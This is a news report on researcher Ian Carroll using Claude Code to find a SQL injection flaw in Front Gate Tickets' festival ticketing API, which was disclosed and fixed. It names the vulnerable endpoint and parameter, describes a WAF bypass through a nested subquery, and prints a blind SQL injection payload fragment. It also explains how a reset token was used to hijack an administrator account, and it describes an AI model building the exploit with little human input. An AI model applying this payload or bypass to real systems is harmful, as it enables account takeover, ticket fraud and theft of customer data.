Hacker Exploits Claude AI to Gain Free Access to Major US Music Festivals

A significant security flaw in Front Gate Tickets (FGT), a subsidiary of Live Nation/Ticketmaster responsible for ticketing major U.S. music festivals such as EDC, Bonnaroo, and Outside Lands, was exploited by a researcher using Anthropic’s Claude AI model. This vulnerability allowed unauthorized administrative access to the platform, enabling the issuance of free tickets and access to sensitive customer data.

The researcher, Ian Carroll, observed that numerous prominent U.S. festivals utilized the same FGT domains for ticketing. While testing the `fgtapi.frontgatetickets.com` API with the fuzzing tool ffuf, Carroll identified that any endpoint path containing the term “device” prompted an error requiring a `deviceUID` parameter. This indicated unauthenticated middleware linked to on-site scanner and box-office hardware.

Further investigation revealed that providing a `deviceUID` value of `12345` was successful, but appending a single quote caused the request to hang. This behavior suggested that the parameter was directly concatenated into a raw SQL query without proper sanitization, exposing the system to SQL injection attacks.

Bypassing the Web Application Firewall with Claude AI

Despite the presence of an AWS Web Application Firewall (WAF), traditional tools like sqlmap were ineffective in exploiting the vulnerability. Carroll then employed Claude Code, running the Opus model, to analyze the issue. Claude determined that the WAF only inspected the outer layer of input, allowing injection payloads nested within a derived subquery to bypass detection.

Since the endpoint did not return direct query outputs, Claude devised a boolean-based blind SQL injection using a MySQL quirk where adding a string like `’x’` to a number coerces it to zero. By crafting payloads such as `deviceUID = x’+(SELECT CASE WHEN THEN 1 ELSE 0 END)– -`, the response alternated between two device names—”MC70-023″ for true and “Intellitix Upload” for false—creating a reliable method for extracting data bit by bit.

The compromised `fgs` database contained over 500 tables, including staff credentials, customer records, and live authentication tokens. Sensitive fields exposed included:

  • FGS_USER: Email, passcode, permissions JSON
  • PERSON: Email, passcode, reset token
  • RESET_TOKEN / API_TOKEN: Live, redeemable session and OAuth tokens

By accessing a live entry from the RESET_TOKEN table after initiating a password reset, Carroll was able to hijack an administrator account without knowing its password. This granted full write access to every festival on the platform, including inventory, pricing, and checkout systems.

With administrative privileges, an attacker could issue unlimited free “comp” tickets to any festival, search customer order databases (a test search for “chris” returned thousands of records), and read or redeem password reset tokens to hijack staff and customer accounts across the platform.

Carroll refrained from exfiltrating bulk data, stating that achieving administrative control over events like EDC and Bonnaroo from a single unauthenticated GET request sufficiently demonstrated the vulnerability.

Notably, Front Gate Tickets and Live Nation lacked a publicly listed security contact, compelling Carroll to guess a valid disclosure email. The vendor reportedly addressed the flaw promptly and indicated plans to establish a bug bounty program.

This incident highlights the evolving landscape of AI-assisted vulnerability research, where advanced language models like Claude can autonomously reverse-engineer WAF logic and construct complex blind injection exploits with minimal human input. As AI tools become more sophisticated, both attackers and defenders must adapt to the new challenges and opportunities they present in cybersecurity.